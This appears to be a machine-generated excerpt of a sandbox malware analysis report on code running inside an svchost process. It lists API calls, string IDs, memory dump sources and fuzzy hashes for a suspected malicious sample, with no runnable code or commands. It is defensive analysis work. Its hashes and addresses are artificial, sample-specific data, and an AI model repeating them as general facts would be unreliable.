                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b333c78d3a20b6ffcc49741ddd97b3878b23029b73683a5636a6cd11ab24f6df
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF0283688169136993175A49C84EFFE68D9E93B8CB20A11AE84462100FB39EB0495E6
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000020,7622F380,-00000010,?,02C7429D,?), ref: 02C7400C
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C7429D,?), ref: 02C74013
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C74052
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                                    • String ID: %d.%d.%d.%d
                                                                                                                                                                                                                    • API String ID: 1060465051-3491811756
                                                                                                                                                                                                                    • Opcode ID: 90f3bffe25918d38bde9a53b8fcd34ac64d1cc177bba7861125c9af0dd738d5d
                                                                                                                                                                                                                    • Instruction ID: b501dc9029d853eb5de918cf6f5f699e1cdf3f06e2e433a3f3b2e217bf1b4a7d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90f3bffe25918d38bde9a53b8fcd34ac64d1cc177bba7861125c9af0dd738d5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F08CB1940760AFC371CF6A9804B66BBE8EF0C701F00892EF69AC7241E23496008BA4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000,75AF7390,?,?,02C85BC4), ref: 02C891DA
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C891F4
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,?,?,02C85BC4), ref: 02C8920C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,02C85BC4), ref: 02C8921D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandle$CloseInformationMutexThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3835061634-0
                                                                                                                                                                                                                    • Opcode ID: 09be646a70fb30ee82f280bf00f80ed7ea9f50fea8c1221e81edf7dc80c5b21b
                                                                                                                                                                                                                    • Instruction ID: 4e8631e050a50982036c6b7776b7dda47c50071a89984e1eb5ade44873145600
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09be646a70fb30ee82f280bf00f80ed7ea9f50fea8c1221e81edf7dc80c5b21b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8F0BB31EC1314B7E7119BA4FC0AB667A9CEB05F14F184695F901E72C0D7B095108796
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000,?,?,02C876BE,00000000,02C7FB03,7f1bfc59,?,?,?,?,?,?), ref: 02C8A2B0
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8A150,00000000,00000000,00000000), ref: 02C8A2C5
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C876BE,00000000,02C7FB03), ref: 02C8A2E3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,02C876BE,00000000,02C7FB03), ref: 02C8A2F4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1825730051-0
                                                                                                                                                                                                                    • Opcode ID: e7951d6158d0f023cb3298f9ca6ecdf0ccdd31ecffba0421fa871bdc5e41cfdb
                                                                                                                                                                                                                    • Instruction ID: 7759032f49a377ce48a3e10749932e5de361918053dd698e3838140c36dd71ea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7951d6158d0f023cb3298f9ca6ecdf0ccdd31ecffba0421fa871bdc5e41cfdb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F0B430EC0345BBE730EB65AC0AB5577ACAB0CB09F208686F909E31C0DBB096108A65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000,?,?,02C8790E,00000000,02C7FB03,7f1bfde3,?,?,?,?,?,?), ref: 02C8E840
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8E6E0,00000000,00000000,00000000), ref: 02C8E855
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C8790E,00000000,02C7FB03), ref: 02C8E873
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,02C8790E,00000000,02C7FB03), ref: 02C8E884
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1825730051-0
                                                                                                                                                                                                                    • Opcode ID: 8ca719e807d88b0a1ccc0abb404333eca5f52df640138c7b2b3827763e3e069d
                                                                                                                                                                                                                    • Instruction ID: d615bfe10b210424d3e604edf11a4273885034ed02a1762a4227eef9c07d4bed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ca719e807d88b0a1ccc0abb404333eca5f52df640138c7b2b3827763e3e069d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EF0B430EC0314BBE7209B68AC0AB5D779CEF04749F244694FD05E31C0DBB0D6108A64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000,?,?,02C8785E,00000000,02C7FB03,7f1bfd65,?,?,?,?,?,?), ref: 02C8D940
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8D7E0,00000000,00000000,00000000), ref: 02C8D955
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,02C8785E,00000000,02C7FB03), ref: 02C8D973
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,02C8785E,00000000,02C7FB03), ref: 02C8D984
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1825730051-0
                                                                                                                                                                                                                    • Opcode ID: d5bc30f6507bf9191a570039fe9a7bc5770d9045f46682a713c508e82709490d
                                                                                                                                                                                                                    • Instruction ID: 2f326863c8cd02590b19e2f8b904345b89ea7561fb1a108660138517cc8e40b9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5bc30f6507bf9191a570039fe9a7bc5770d9045f46682a713c508e82709490d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEF0B470EC0304B7E7209B75AD0AF55B69C9B04B59F144694F90AE31C4DBB09610CB64
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: private$public
                                                                                                                                                                                                                    • API String ID: 0-4176808989
                                                                                                                                                                                                                    • Opcode ID: 95edc4579f270cfbb72ce7a2e89be70b5a00897b7fb9d6ab8d0e8bae2bfc8fae
                                                                                                                                                                                                                    • Instruction ID: ec1e89868abdafde7671aa854f668a39e363cdb733b1ccd60b70895c1776268f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95edc4579f270cfbb72ce7a2e89be70b5a00897b7fb9d6ab8d0e8bae2bfc8fae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB415B326041158ACB30BB2CC8557BB7366EFC532CB49C695F84ACB6A4F721EE45C780
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CountTick_snprintf
                                                                                                                                                                                                                    • String ID: %dd %dh %dm
                                                                                                                                                                                                                    • API String ID: 3495410349-3074259717
                                                                                                                                                                                                                    • Opcode ID: 0640c349b482966ac159f99e89a9e93f9b7a32822f268aa3d3c49e345b37afc3
                                                                                                                                                                                                                    • Instruction ID: 40d2b3104a05a57f35212cc7c0754e7d4fd353f4d78f6662d977a8fa07f0f0fe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0640c349b482966ac159f99e89a9e93f9b7a32822f268aa3d3c49e345b37afc3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F08262B8105457A35C541D6C1AABA594F87C8311B8DC67DFD0ACF3E9DCB49C514290
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A834
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7A850
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MutexObjectReleaseSingleWait
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2017088797-3387790918
                                                                                                                                                                                                                    • Opcode ID: 481158786ac46d56176740526b23a3a8955e17810fc96629d63a91feb70789d4
                                                                                                                                                                                                                    • Instruction ID: 957f9616aee886f5acf473ca777cac56d7ab32bc140f39379ed3d1ad4d576afd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 481158786ac46d56176740526b23a3a8955e17810fc96629d63a91feb70789d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50E01275D846489FC706DF58F448B197BA8B758321F008B56F868873A1C774A960CB50
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,00000008,00000000,?), ref: 02CA6F28
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000008,00000000,?), ref: 02CA6FCB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02CA7044
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02CA707D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1297977491-0
                                                                                                                                                                                                                    • Opcode ID: 5a99cf2c19caa97d2b88e01849c5dc47cdf9900b7fa518adc4f37197e6ee117c
                                                                                                                                                                                                                    • Instruction ID: fcec472d8811079ba1f776a678c5332af73bd4d2dcd02613962e01a052ad3254
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a99cf2c19caa97d2b88e01849c5dc47cdf9900b7fa518adc4f37197e6ee117c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F516576A00B028FC714CF69C9D566AF7F6FF84308B28492DD98687A10E772F954CB80
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02C7DA3F
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02C7DA46
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7DA56
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,00000014,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000), ref: 02C7DA61
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 471586229-0
                                                                                                                                                                                                                    • Opcode ID: e92818099e0351410444197cd07c409c11ba63b2a236b4055ff852c97ff7d887
                                                                                                                                                                                                                    • Instruction ID: 5eb95878f65c72346972bc3317d04c08cfa5de28d9cf7efa16dcff17412b4f01
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e92818099e0351410444197cd07c409c11ba63b2a236b4055ff852c97ff7d887
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9901F233A852156B86219A69AC44FE7B79CFFC5770F008251FD06DF184D721EA0483E0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02C7E94B,?,?,?), ref: 02C7E2A8
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C7E94B,?,?,?), ref: 02C7E2AF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7E2BF
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,02C7E94B,?,?,?), ref: 02C7E2CA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 471586229-0
                                                                                                                                                                                                                    • Opcode ID: d8de82c6c68c7a200bdb47a3d304783443ba7fb4700a11398772ab85a75e0eb4
                                                                                                                                                                                                                    • Instruction ID: b62f0556ec8815c3ad3f713ae6f7287db69877e0de0a2f1143eff459f65c52f3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8de82c6c68c7a200bdb47a3d304783443ba7fb4700a11398772ab85a75e0eb4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5F05533A0166137C6226A99AC44FCBB75CEFD2760F400260FE00EF280CA20DE0087F1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,?,7622F380,?,02C7D799,00000000,?,00000000,02C7EAE2), ref: 02C7D3A4
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D3A7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D3B4
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D3B7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1670920773-0
                                                                                                                                                                                                                    • Opcode ID: 121c50ac3785073cf1e822029238d3db2390aeb27431e563befb30a8878f4b53
                                                                                                                                                                                                                    • Instruction ID: b848486a1f158c6433e21d6dcf7b06956120b6300da42dc684efe6e88b722ed3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 121c50ac3785073cf1e822029238d3db2390aeb27431e563befb30a8878f4b53
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1F06D74E40362ABEB105F39AC48B977BECAF48686F940481E90ED3140E775C910AAA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB1C05
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02CB1C08
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB1C15
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02CB1C18
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1670920773-0
                                                                                                                                                                                                                    • Opcode ID: f4fb82d938ff516ed9fc9f7cc597840f4ed41ce2ee13c1e50acb16e997651bc0
                                                                                                                                                                                                                    • Instruction ID: 9aba192d21fd338b10a677a2566ba91084e4345642c3fd3c61d2f9676863cdc5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4fb82d938ff516ed9fc9f7cc597840f4ed41ce2ee13c1e50acb16e997651bc0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BE08632FC526877C51226A66C0CF877B1CDFC1B72F094411F608D3141C660941096F0